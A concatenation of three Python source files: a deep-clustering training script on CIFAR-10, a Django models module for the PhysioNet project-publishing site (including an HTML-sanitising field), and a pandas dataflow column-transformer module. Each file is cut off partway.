from sklearn.decomposition import PCA
from utils.util import cluster_acc, Identity, AverageMeter, seed_torch, str2bool
from utils import ramps
from models.resnet_3x3 import ResNet, BasicBlock
from modules.module import feat2prob, target_distribution
from data.cifarloader import CIFAR10Loader
from tqdm import tqdm
import numpy as np
import warnings
import random
import os
warnings.filterwarnings("ignore", category=UserWarning)
from sklearn.manifold import TSNE
import pandas as pd
import seaborn as sns
# class ResNet_features(nn.Module):
# def __init__(self, resnet):
# super(ResNet_features, self).__init__()
# self.in_planes = 64
#
# self.conv1 = resnet.conv1
# self.bn1 = resnet.bn1
# self.layer1 = resnet.layer1
# self.layer2 = resnet.layer2
# self.layer3 = resnet.layer3
# self.layer4 = resnet.layer4
# # self.linear = nn.Linear(512*block.expansion, num_classes)
#
# # def _make_layer(self, block, planes, num_blocks, stride):
# # strides = [stride] + [1]*(num_blocks-1)
# # layers = []
# # for stride in strides:
# # layers.append(block(self.in_planes, planes, stride))
# # self.in_planes = planes * block.expansion
# # return nn.Sequential(*layers)
#
# def forward(self, x):
# out = F.relu(self.bn1(self.conv1(x)))
# out = self.layer1(out)
# out = self.layer2(out)
# out = self.layer3(out)
# out = self.layer4(out)
# out = F.avg_pool2d(out, 4)
# out = out.view(out.size(0), -1)
# # out = self.linear(out)
# return out
def plot_tsne(eval_loader, model,device, n_clusters=5, filename='tsne.png'):
torch.manual_seed(1)
# model = model.to(device)
# cluster parameter initiate
# feat_model = nn.Sequential(*list(model.children())[:-1])
feat_model = model
# feat_model = ResNet_features(model)
feat_model.eval()
targets = np.zeros(len(eval_loader.dataset))
feats = np.zeros((len(eval_loader.dataset), 512))
for _, (x, label, idx) in enumerate(eval_loader):
x = x.to(device)
feat = feat_model(x)
# print('feat', feat.shape)
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.data.cpu().numpy()
targets[idx] = label.data.cpu().numpy()
mus_tsne = TSNE(n_components=2).fit_transform(feats)
# kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(mus_tsne)
x = mus_tsne[:,0]
y = mus_tsne[:,1]
data = pd.DataFrame()
data['x'] = x
data['y'] = y
data['label'] = targets
print('data label')
print(data['label'])
print('x', x)
print('feats', feats)
# data['label'] = kmeans.labels_
#current_palette = sns.color_palette()
#sns.palplot(current_palette)
ax = sns.scatterplot(
x="x", y="y",
hue="label",
data=data,
palette=sns.color_palette("hls", n_clusters),
alpha=0.3
)
fig = ax.get_figure()
fig.savefig(filename)
def plot_tsne_train(eval_loader, model,device, n_clusters=5, filename='tsne.png'):
torch.manual_seed(1)
# model = model.to(device)
# cluster parameter initiate
# feat_model = nn.Sequential(*list(model.children())[:-1])
feat_model = model
# feat_model = ResNet_features(model)
feat_model.eval()
targets = np.zeros(len(eval_loader.dataset))
feats = np.zeros((len(eval_loader.dataset), 512))
# for _, ((x, _), label, idx) in enumerate(eval_loader):
for _, (x, label, idx) in enumerate(eval_loader):
x = x.to(device)
feat = feat_model(x)
# print('feat', feat.shape)
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.data.cpu().numpy()
targets[idx] = label.data.cpu().numpy()
mus_tsne = TSNE(n_components=2).fit_transform(feats)
# kmeans = KMeans(n_clusters=n_clusters, random_state=0).fit(mus_tsne)
x = mus_tsne[:,0]
y = mus_tsne[:,1]
data = pd.DataFrame()
data['x'] = x
data['y'] = y
data['label'] = targets
print('data label')
print(data['label'])
print('x', x)
print('feats', feats)
# data['label'] = kmeans.labels_
#current_palette = sns.color_palette()
#sns.palplot(current_palette)
ax = sns.scatterplot(
x="x", y="y",
hue="label",
data=data,
palette=sns.color_palette("hls", n_clusters),
alpha=0.3
)
fig = ax.get_figure()
fig.savefig(filename)
def init_prob_kmeans(model, eval_loader, args):
torch.manual_seed(1)
model = model.to(device)
# cluster parameter initiate
model.eval()
targets = np.zeros(len(eval_loader.dataset))
feats = np.zeros((len(eval_loader.dataset), 512))
for _, (x, label, idx) in enumerate(eval_loader):
x = x.to(device)
feat = model(x)
print('x shape', x.shape)
# print('feat init', feat.shape)
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.data.cpu().numpy()
targets[idx] = label.data.cpu().numpy()
# evaluate clustering performance
pca = PCA(n_components=args.n_clusters)
feats = pca.fit_transform(feats)
kmeans = KMeans(n_clusters=args.n_clusters, n_init=20)
y_pred = kmeans.fit_predict(feats)
acc, nmi, ari = cluster_acc(targets, y_pred), nmi_score(targets, y_pred), ari_score(targets, y_pred)
print('Init acc {:.4f}, nmi {:.4f}, ari {:.4f}'.format(acc, nmi, ari))
probs = feat2prob(torch.from_numpy(feats), torch.from_numpy(kmeans.cluster_centers_))
return acc, nmi, ari, kmeans.cluster_centers_, probs
def warmup_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.warmup_lr, momentum=args.momentum, weight_decay=args.weight_decay)
for epoch in range(args.warmup_epochs):
loss_record = AverageMeter()
model.train()
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Warmup_train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
args.p_targets = target_distribution(probs)
def Baseline_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(probs)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def PI_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
w = 0
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
w = args.rampup_coefficient * ramps.sigmoid_rampup(epoch, args.rampup_length)
for batch_idx, ((x, x_bar), label, idx) in enumerate(tqdm(train_loader)):
x, x_bar = x.to(device), x_bar.to(device)
feat = model(x)
feat_bar = model(x_bar)
prob = feat2prob(feat, model.center)
prob_bar = feat2prob(feat_bar, model.center)
sharp_loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
consistency_loss = F.mse_loss(prob, prob_bar)
loss = sharp_loss + w * consistency_loss
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(probs)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def TE_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
w = 0
alpha = 0.6
ntrain = len(train_loader.dataset)
Z = torch.zeros(ntrain, args.n_clusters).float().to(device) # intermediate values
z_ema = torch.zeros(ntrain, args.n_clusters).float().to(device) # temporal outputs
z_epoch = torch.zeros(ntrain, args.n_clusters).float().to(device) # current outputs
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
w = args.rampup_coefficient * ramps.sigmoid_rampup(epoch, args.rampup_length)
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
z_epoch[idx, :] = prob
prob_bar = Variable(z_ema[idx, :], requires_grad=False)
sharp_loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
consistency_loss = F.mse_loss(prob, prob_bar)
loss = sharp_loss + w * consistency_loss
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
Z = alpha * Z + (1. - alpha) * z_epoch
z_ema = Z * (1. / (1. - alpha ** (epoch + 1)))
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(probs)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def TEP_train(model, train_loader, eva_loader, args):
optimizer = SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
w = 0
alpha = 0.6
ntrain = len(train_loader.dataset)
Z = torch.zeros(ntrain, args.n_clusters).float().to(device) # intermediate values
z_bars = torch.zeros(ntrain, args.n_clusters).float().to(device) # temporal outputs
z_epoch = torch.zeros(ntrain, args.n_clusters).float().to(device) # current outputs
for epoch in range(args.epochs):
loss_record = AverageMeter()
model.train()
for batch_idx, ((x, _), label, idx) in enumerate(tqdm(train_loader)):
x = x.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
loss = F.kl_div(prob.log(), args.p_targets[idx].float().to(device))
loss_record.update(loss.item(), x.size(0))
optimizer.zero_grad()
loss.backward()
optimizer.step()
print('Train Epoch: {} Avg Loss: {:.4f}'.format(epoch, loss_record.avg))
_, _, _, probs = test(model, eva_loader, args)
z_epoch = probs.float().to(device)
Z = alpha * Z + (1. - alpha) * z_epoch
z_bars = Z * (1. / (1. - alpha ** (epoch + 1)))
if epoch % args.update_interval ==0:
print('updating target ...')
args.p_targets = target_distribution(z_bars)
torch.save(model.state_dict(), args.model_dir)
print("model saved to {}.".format(args.model_dir))
def test(model, test_loader, args):
model.eval()
preds=np.array([])
targets=np.array([])
feats = np.zeros((len(test_loader.dataset), args.n_clusters))
probs= np.zeros((len(test_loader.dataset), args.n_clusters))
for batch_idx, (x, label, idx) in enumerate(tqdm(test_loader)):
x, label = x.to(device), label.to(device)
feat = model(x)
prob = feat2prob(feat, model.center)
_, pred = prob.max(1)
targets=np.append(targets, label.cpu().numpy())
preds=np.append(preds, pred.cpu().numpy())
idx = idx.data.cpu().numpy()
feats[idx, :] = feat.cpu().detach().numpy()
probs[idx, :] = prob.cpu().detach().numpy()
acc, nmi, ari = cluster_acc(targets.astype(int), preds.astype(int)), nmi_score(targets, preds), ari_score(targets, preds)
print('Test acc {:.4f}, nmi {:.4f}, ari {:.4f}'.format(acc, nmi, ari))
probs = torch.from_numpy(probs)
return acc, nmi, ari, probs
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description='cluster',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--warmup_lr', type=float, default=0.1)
parser.add_argument('--lr', type=float, default=0.05)
parser.add_argument('--momentum', type=float, default=0.9)
parser.add_argument('--weight_decay', type=float, default=1e-4)
parser.add_argument('--warmup_epochs', default=10, type=int)
parser.add_argument('--epochs', default=100, type=int)
parser.add_argument('--rampup_length', default=5, type=int)
parser.add_argument('--rampup_coefficient', type=float, default=10.0)
parser.add_argument('--batch_size', default=128, type=int)
parser.add_argument('--update_interval', default=5, type=int)
parser.add_argument('--n_clusters', default=5, type=int)
parser.add_argument('--seed', default=1, type=int)
parser.add_argument('--save_txt', default=False, type=str2bool, help='save txt or not', metavar='BOOL')
parser.add_argument('--pretrain_dir', type=str, default='./data/experiments/pretrained/resnet18_cifar10_classif_5.pth')
parser.add_argument('--dataset_root', type=str, default='./data/datasets/CIFAR/')
parser.add_argument('--exp_root', type=str, default='./data/experiments/')
parser.add_argument('--model_name', type=str, default='resnet18')
parser.add_argument('--save_txt_name', type=str, default='result.txt')
parser.add_argument('--DTC', type=str, default='PI')
args = parser.parse_args()
args.cuda = torch.cuda.is_available()
device = torch.device("cuda" if args.cuda else "cpu")
seed_torch(args.seed)
runner_name = os.path.basename(__file__).split(".")[0]
model_dir= args.exp_root + '{}/{}'.format(runner_name, args.DTC)
if not os.path.exists(model_dir):
os.makedirs(model_dir)
args.model_dir = model_dir+'/'+args.model_name+'.pth'
args.save_txt_path= args.exp_root+ '{}/{}/{}'.format(runner_name, args.DTC, args.save_txt_name)
train_loader = CIFAR10Loader(root=args.dataset_root, batch_size=args.batch_size, split='train', labeled=False, aug='twice', shuffle=True)
eval_loader = CIFAR10Loader(root=args.dataset_root, batch_size=args.batch_size, split='train', labeled=False, aug=None, shuffle=False)
model = ResNet(BasicBlock, [2,2,2,2], 5).to(device)
model.load_state_dict(torch.load(args.pretrain_dir), strict=False)
model.linear= Identity()
init_feat_extractor = model
init_acc, init_nmi, init_ari, init_centers, init_probs = init_prob_kmeans(init_feat_extractor, eval_loader, args)
args.p_targets = target_distribution(init_probs)
model = ResNet(BasicBlock, [2,2,2,2], args.n_clusters).to(device)
model.load_state_dict(init_feat_extractor.state_dict(), strict=False)
model.center= Parameter(torch.Tensor(args.n_clusters, args.n_clusters))
model.center.data
# Repository: Lucas-Mc/physionet-build, file: physionet-django/project/models.py
from datetime import datetime, timedelta
import hashlib
from html import unescape
import os
import shutil
import uuid
import pdb
import pytz
import stat
import logging
from distutils.version import StrictVersion
import bleach
import ckeditor.fields
from html2text import html2text
from django.conf import settings
from django.contrib.contenttypes.fields import GenericForeignKey, GenericRelation
from django.contrib.contenttypes.models import ContentType
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.core.validators import MaxValueValidator, MinValueValidator
from django.contrib.auth.hashers import check_password, make_password
from django.db import models, DatabaseError, transaction
from django.forms.utils import ErrorList
from django.urls import reverse
from django.utils import timezone
from django.utils.html import format_html, strip_tags
from django.utils.text import slugify
from background_task import background
from django.utils.crypto import get_random_string
from project.quota import DemoQuotaManager
from project.utility import (get_tree_size, get_file_info, get_directory_info,
list_items, StorageInfo, list_files,
clear_directory)
from project.validators import (validate_doi, validate_subdir,
validate_version, validate_slug,
MAX_PROJECT_SLUG_LENGTH,
validate_title, validate_topic)
from user.validators import validate_affiliation
from physionet.utility import (sorted_tree_files, zip_dir)
LOGGER = logging.getLogger(__name__)
@background()
def move_files_as_readonly(pid, dir_from, dir_to, make_zip):
"""
Schedule a background task to set the files as read only.
If a file starts with a Shebang, then it will be set as executable.
"""
published_project = PublishedProject.objects.get(id=pid)
published_project.make_checksum_file()
quota = published_project.quota_manager()
published_project.incremental_storage_size = quota.bytes_used
published_project.save(update_fields=['incremental_storage_size'])
published_project.set_storage_info()
# Make the files read only
file_root = published_project.project_file_root()
for root, dirs, files in os.walk(file_root):
for f in files:
fline = open(os.path.join(root, f), 'rb').read(2)
if fline[:2] == b'#!':
os.chmod(os.path.join(root, f), 0o555)
else:
os.chmod(os.path.join(root, f), 0o444)
for d in dirs:
os.chmod(os.path.join(root, d), 0o555)
if make_zip:
published_project.make_zip()
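# Hedged usage sketch (not part of the original module): with
# django-background-tasks, calling the decorated function above enqueues the
# work for a worker process instead of running it inline. The directory
# arguments below are purely illustrative:
#
#   move_files_as_readonly(
#       published_project.id,
#       '/data/active-projects/slug',    # dir_from (illustrative path)
#       '/data/published-projects/slug', # dir_to (illustrative path)
#       make_zip=True,
#   )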
class SafeHTMLField(ckeditor.fields.RichTextField):
"""
An HTML text field that permits only "safe" content.
On the client side, this field is displayed as an interactive
WYSIWYG editor (see ckeditor.fields.RichTextField.)
On the server side, the HTML text is "cleaned" using the bleach
library to ensure that all tags are properly closed, entities are
well-formed, etc., and to remove or escape any unsafe tags or
attributes.
The permitted set of tags and attributes is generated from the
corresponding 'allowedContent' rules in settings.CKEDITOR_CONFIGS
(which also defines the client-side whitelisting rules and the set
of options that are visible to the user.) For example:
'allowedContent': {
'a': {'attributes': ['href']},
'em': True,
'*': {'attributes': ['title']},
}
This would permit the use of 'a' and 'em' tags (all other tags are
forbidden.) 'a' tags are permitted to have an 'href' attribute,
and any tag is permitted to have a 'title' attribute.
NOTE: This class does not use ckeditor's 'disallowedContent'
rules. Those rules can be used to perform tag/attribute
blacklisting on the client side, but will not be enforced on the
server side.
"""
# The following protocols may be used in 'href', 'src', and
# similar attributes.
_protocols = ['http', 'https', 'ftp', 'mailto']
# The following attributes are forbidden on the server side even
# if permitted on client side. (This is a kludge; permitting
# 'width' to be set on the client side makes editing tables
# easier.)
_attribute_blacklist = {('table', 'width')}
# The following CSS properties may be set via inline styles (but
# only on elements for which the 'style' attribute itself is
# permitted.)
_styles = ['text-align']
def __init__(self, config_name='default', strip=False,
strip_comments=True, **kwargs):
super().__init__(config_name=config_name, **kwargs)
conf = settings.CKEDITOR_CONFIGS[config_name]
tags = []
attrs = {}
for (tag, props) in conf['allowedContent'].items():
if tag != '*':
tags.append(tag)
if isinstance(props, dict) and 'attributes' in props:
attrs[tag] = []
for attr in props['attributes']:
if (tag, attr) not in self._attribute_blacklist:
attrs[tag].append(attr)
self._cleaner = bleach.Cleaner(tags=tags, attributes=attrs,
styles=self._styles,
protocols=self._protocols,
strip=strip,
strip_comments=strip_comments)
def clean(self, value, model_instance):
value = self._cleaner.clean(value)
return super().clean(value, model_instance)
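# Illustrative sketch (assumed config, not the project's real CKEDITOR_CONFIGS):
# with the 'allowedContent' example from the docstring above, the derived
# cleaner is roughly equivalent to
#
#     cleaner = bleach.Cleaner(tags=['a', 'em'],
#                              attributes={'a': ['href']},
#                              styles=['text-align'],
#                              protocols=['http', 'https', 'ftp', 'mailto'],
#                              strip=False, strip_comments=True)
#
# so that, e.g., '<a href="https://x" onclick="evil()">hi</a>' cleans to
# '<a href="https://x">hi</a>' (the disallowed onclick attribute is dropped).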
class Affiliation(models.Model):
"""
Affiliations belonging to an author
"""
name = models.CharField(max_length=202, validators=[validate_affiliation])
author = models.ForeignKey('project.Author', related_name='affiliations',
on_delete=models.CASCADE)
class Meta:
unique_together = (('name', 'author'),)
class PublishedAffiliation(models.Model):
"""
Affiliations belonging to a published author
"""
name = models.CharField(max_length=202, validators=[validate_affiliation])
author = models.ForeignKey('project.PublishedAuthor',
related_name='affiliations', on_delete=models.CASCADE)
class Meta:
unique_together = (('name', 'author'),)
class BaseAuthor(models.Model):
"""
Base model for a project's author/creator. Credited for creating the
resource.
Datacite definition: "The main researchers involved in producing the
data, or the authors of the publication, in priority order."
"""
user = models.ForeignKey('user.User', related_name='%(class)ss',
on_delete=models.CASCADE)
display_order = models.PositiveSmallIntegerField()
is_submitting = models.BooleanField(default=False)
is_corresponding = models.BooleanField(default=False)
# When they approved the project for publication
approval_datetime = models.DateTimeField(null=True)
class Meta:
abstract = True
def __str__(self):
# Best representation for form display
user = self.user
return '{} --- {}'.format(user.username, user.email)
class Author(BaseAuthor):
"""
The author model for ArchivedProject/ActiveProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
corresponding_email = models.ForeignKey('user.AssociatedEmail', null=True,
on_delete=models.SET_NULL)
creation_date = models.DateTimeField(default=timezone.now)
class Meta:
unique_together = (('user', 'content_type', 'object_id',),
('display_order', 'content_type', 'object_id'))
def get_full_name(self, reverse=False):
"""
The name is tied to the profile. There is no form for authors
to change their names. Return the full name.
Args:
reverse: Format of the return string. If False (default) then
'firstnames lastname'. If True then 'lastname, firstnames'.
"""
last = self.user.profile.last_name
first = self.user.profile.first_names
if reverse:
return ', '.join([last, first])
else:
return ' '.join([first, last])
def initialed_name(self, commas=True, periods=True):
"""
Return author's name in citation style.
"""
last = self.user.profile.last_name
first = self.user.profile.first_names
final_string = '{}, {}'.format(
last, ' '.join('{}.'.format(i[0]) for i in first.split()))
if not commas:
final_string = final_string.replace(',', '')
if not periods:
final_string = final_string.replace('.', '')
return final_string
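# e.g. for first_names "Mary Jane" and last_name "Smith", initialed_name()
# returns "Smith, M. J."; with commas=False and periods=False it returns
# "Smith M J".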
def disp_name_email(self):
"""
"""
return '{} ({})'.format(self.get_full_name(), self.user.email)
def import_profile_info(self):
"""
Import profile information (names) into the Author object.
Also create affiliation object if present in profile.
"""
profile = self.user.profile
if profile.affiliation:
Affiliation.objects.create(name=profile.affiliation,
author=self)
return True
return False
def set_display_info(self, set_affiliations=True):
"""
Set the fields used to display the author
"""
user = self.user
self.name = user.profile.get_full_name()
self.email = user.email
self.username = user.username
if set_affiliations:
self.text_affiliations = [a.name for a in self.affiliations.all()]
class PublishedAuthor(BaseAuthor):
"""
The author model for PublishedProject
"""
first_names = models.CharField(max_length=100, default='')
last_name = models.CharField(max_length=50, default='')
corresponding_email = models.EmailField(null=True)
project = models.ForeignKey('project.PublishedProject',
related_name='authors', db_index=True, on_delete=models.CASCADE)
class Meta:
unique_together = (('user', 'project'),
('display_order', 'project'))
def get_full_name(self, reverse=False):
"""
Return the full name.
Args:
reverse: Format of the return string. If False (default) then
'firstnames lastname'. If True then 'lastname, firstnames'.
"""
if reverse:
return ', '.join([self.last_name, self.first_names])
else:
return ' '.join([self.first_names, self.last_name])
def set_display_info(self):
"""
Set the fields used to display the author
"""
self.name = self.get_full_name()
self.username = self.user.username
self.email = self.user.email
self.text_affiliations = [a.name for a in self.affiliations.all()]
def initialed_name(self, commas=True, periods=True):
final_string = '{}, {}'.format(self.last_name, ' '.join('{}.'
.format(i[0]) for i in self.first_names
.split()))
if not commas:
final_string = final_string.replace(',', '')
if not periods:
final_string = final_string.replace('.', '')
return final_string
class Topic(models.Model):
"""
Topic information to tag ActiveProject/ArchivedProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
description = models.CharField(max_length=50, validators=[validate_topic])
class Meta:
unique_together = (('description', 'content_type', 'object_id'),)
def __str__(self):
return self.description
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.project.content_modified()
def delete(self, *args, **kwargs):
super().delete(*args, **kwargs)
self.project.content_modified()
class PublishedTopic(models.Model):
"""
Topic information to tag PublishedProject
"""
projects = models.ManyToManyField('project.PublishedProject',
related_name='topics')
description = models.CharField(max_length=50, validators=[validate_topic])
project_count = models.PositiveIntegerField(default=0)
def __str__(self):
return self.description
class Reference(models.Model):
"""
Reference field for ActiveProject/ArchivedProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
description = models.CharField(max_length=1000)
class Meta:
unique_together = (('description', 'content_type', 'object_id'),)
def __str__(self):
return self.description
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.project.content_modified()
def delete(self, *args, **kwargs):
super().delete(*args, **kwargs)
self.project.content_modified()
class PublishedReference(models.Model):
"""
"""
description = models.CharField(max_length=1000)
project = models.ForeignKey('project.PublishedProject',
related_name='references', on_delete=models.CASCADE)
class Meta:
unique_together = (('description', 'project'))
class Contact(models.Model):
"""
Contact for a PublishedProject
"""
name = models.CharField(max_length=120)
affiliations = models.CharField(max_length=150)
email = models.EmailField(max_length=255)
project = models.OneToOneField('project.PublishedProject',
related_name='contact', on_delete=models.CASCADE)
class BasePublication(models.Model):
"""
Base model for the publication to cite when referencing the
resource
"""
citation = models.CharField(max_length=1000)
url = models.URLField(blank=True, default='')
class Meta:
abstract = True
class Publication(BasePublication):
"""
Publication for ArchivedProject/ActiveProject
"""
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
project = GenericForeignKey('content_type', 'object_id')
def save(self, *args, **kwargs):
super().save(*args, **kwargs)
self.project.content_modified()
def delete(self, *args, **kwargs):
super().delete(*args, **kwargs)
self.project.content_modified()
class PublishedPublication(BasePublication):
"""
Publication for published project
"""
project = models.ForeignKey('project.PublishedProject',
db_index=True, related_name='publications', on_delete=models.CASCADE)
class CoreProject(models.Model):
"""
The core underlying object that links all versions of the project in
its various states
"""
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
creation_datetime = models.DateTimeField(auto_now_add=True)
# doi pointing to the latest version of the published project
doi = models.CharField(max_length=50, blank=True, null=True)
# Maximum allowed storage capacity in bytes.
# Default = 100 MiB (104857600 bytes); validators allow 100 MiB up to 100 TiB (109951162777600 bytes).
storage_allowance = models.BigIntegerField(default=104857600,
validators=[MaxValueValidator(109951162777600),
MinValueValidator(104857600)])
def active_new_version(self):
"Whether | |
# Repository: ajmal017/amp
import collections
import datetime
import inspect
import logging
from typing import Any, Callable, Dict, Iterable, List, Optional, Tuple, Union
import pandas as pd
import core.dataflow.nodes.base as cdnb
import core.dataflow.utils as cdu
import core.finance as cfinan
import core.signal_processing as csigna
import helpers.dbg as dbg
_LOG = logging.getLogger(__name__)
# TODO(*): Create a dataflow types file.
_COL_TYPE = Union[int, str]
_PANDAS_DATE_TYPE = Union[str, pd.Timestamp, datetime.datetime]
_RESAMPLING_RULE_TYPE = Union[pd.DateOffset, pd.Timedelta, str]
class ColumnTransformer(cdnb.Transformer, cdnb.ColModeMixin):
"""
Perform non-index modifying changes of columns.
"""
def __init__(
self,
nid: str,
transformer_func: Callable[..., pd.DataFrame],
transformer_kwargs: Optional[Dict[str, Any]] = None,
# TODO(Paul): May need to assume `List` instead.
cols: Optional[Iterable[str]] = None,
col_rename_func: Optional[Callable[[Any], Any]] = None,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
:param nid: unique node id
:param transformer_func: df -> df
- The keyword `info` (if present) means that:
- An empty dict is passed in to this `info`
- The resulting (populated) dict is included in the node's
`_info`
:param transformer_kwargs: `transformer_func` kwargs
:param cols: columns to transform; `None` defaults to all available.
:param col_rename_func: function for naming transformed columns, e.g.,
`lambda x: "zscore_" + x`
:param col_mode: determines what columns are propagated by the node.
Same values as in `apply_col_mode()`.
:param nan_mode: determines how to handle NaNs
- `leave_unchanged` (default): do not process NaNs
- `drop`: drop rows containing NaNs; applied to all selected columns simultaneously.
"""
super().__init__(nid)
if cols is not None:
dbg.dassert_isinstance(cols, list)
self._cols = cols
self._col_rename_func = col_rename_func
self._col_mode = col_mode
self._transformer_func = transformer_func
self._transformer_kwargs = transformer_kwargs or {}
# Store the list of columns after the transformation.
self._transformed_col_names = None
self._nan_mode = nan_mode or "leave_unchanged"
# State of the object. This is set by derived classes.
self._fit_cols = cols
@property
def transformed_col_names(self) -> List[str]:
dbg.dassert_is_not(
self._transformed_col_names,
None,
"No transformed column names. This may indicate "
"an invocation prior to graph execution.",
)
return self._transformed_col_names
def _transform(
self, df: pd.DataFrame
) -> Tuple[pd.DataFrame, collections.OrderedDict]:
df_in = df.copy()
df = df.copy()
if self._fit_cols is None:
self._fit_cols = df.columns.tolist() or self._cols
if self._cols is None:
dbg.dassert_set_eq(self._fit_cols, df.columns)
df = df[self._fit_cols]
# Handle NaNs.
idx = df.index
if self._nan_mode == "leave_unchanged":
pass
elif self._nan_mode == "drop":
df = df.dropna()
else:
raise ValueError(f"Unrecognized `nan_mode` {self._nan_mode}")
# Initialize container to store info (e.g., auxiliary stats) in the
# node.
info = collections.OrderedDict()
# Perform the column transformation operations.
# Introspect to see whether `_transformer_func` contains an `info`
# parameter. If so, inject an empty dict to be populated when
# `_transformer_func` is executed.
func_sig = inspect.signature(self._transformer_func)
if "info" in func_sig.parameters:
func_info = collections.OrderedDict()
df = self._transformer_func(
df, info=func_info, **self._transformer_kwargs
)
info["func_info"] = func_info
else:
df = self._transformer_func(df, **self._transformer_kwargs)
# Reindex df to align it with the original data.
df = df.reindex(index=idx)
# TODO(Paul): Consider supporting the option of relaxing or foregoing this
# check.
dbg.dassert(
df.index.equals(df_in.index),
"Input/output indices differ but are expected to be the same!",
)
# Maybe merge transformed columns with a subset of input df columns.
df = self._apply_col_mode(
df_in,
df,
cols=self._fit_cols,
col_rename_func=self._col_rename_func,
col_mode=self._col_mode,
)
# Update `info`.
info["df_transformed_info"] = cdu.get_df_info_as_string(df)
return df, info
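# Construction sketch (hedged): the node id, column name, and z-score lambda
# below are illustrative assumptions, and executing the node requires the
# surrounding dataflow DAG machinery provided by `cdnb.Transformer`:
#
#     zscore_node = ColumnTransformer(
#         nid="zscore",
#         transformer_func=lambda df: (df - df.mean()) / df.std(),
#         cols=["close"],
#         col_rename_func=lambda c: "zscore_" + c,
#         col_mode="merge_all",
#     )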
class SeriesTransformer(cdnb.Transformer, cdnb.ColModeMixin):
"""
Perform non-index modifying changes of columns.
TODO(*): Factor out code common with `SeriesToSeriesTransformer`.
"""
def __init__(
self,
nid: str,
transformer_func: Callable[..., pd.DataFrame],
transformer_kwargs: Optional[Dict[str, Any]] = None,
# TODO(Paul): May need to assume `List` instead.
cols: Optional[Iterable[Union[int, str]]] = None,
col_rename_func: Optional[Callable[[Any], Any]] = None,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
:param nid: unique node id
:param transformer_func: srs -> df. The keyword `info` (if present) is
assumed to have a specific semantic meaning. If present,
- An empty dict is passed in to this `info`
- The resulting (populated) dict is included in the node's
`_info`
:param transformer_kwargs: transformer_func kwargs
:param cols: columns to transform; `None` defaults to all available.
:param col_rename_func: function for naming transformed columns, e.g.,
lambda x: "zscore_" + x
:param col_mode: `merge_all`, `replace_selected`, or `replace_all`.
Determines what columns are propagated by the node.
:param nan_mode: `leave_unchanged` or `drop`. If `drop`, applies to
columns individually.
"""
super().__init__(nid)
if cols is not None:
dbg.dassert_isinstance(cols, list)
self._cols = cols
self._col_rename_func = col_rename_func
self._col_mode = col_mode
self._transformer_func = transformer_func
self._transformer_kwargs = transformer_kwargs or {}
# Store the list of columns after the transformation.
self._transformed_col_names = None
self._nan_mode = nan_mode or "leave_unchanged"
self._fit_cols = cols
@property
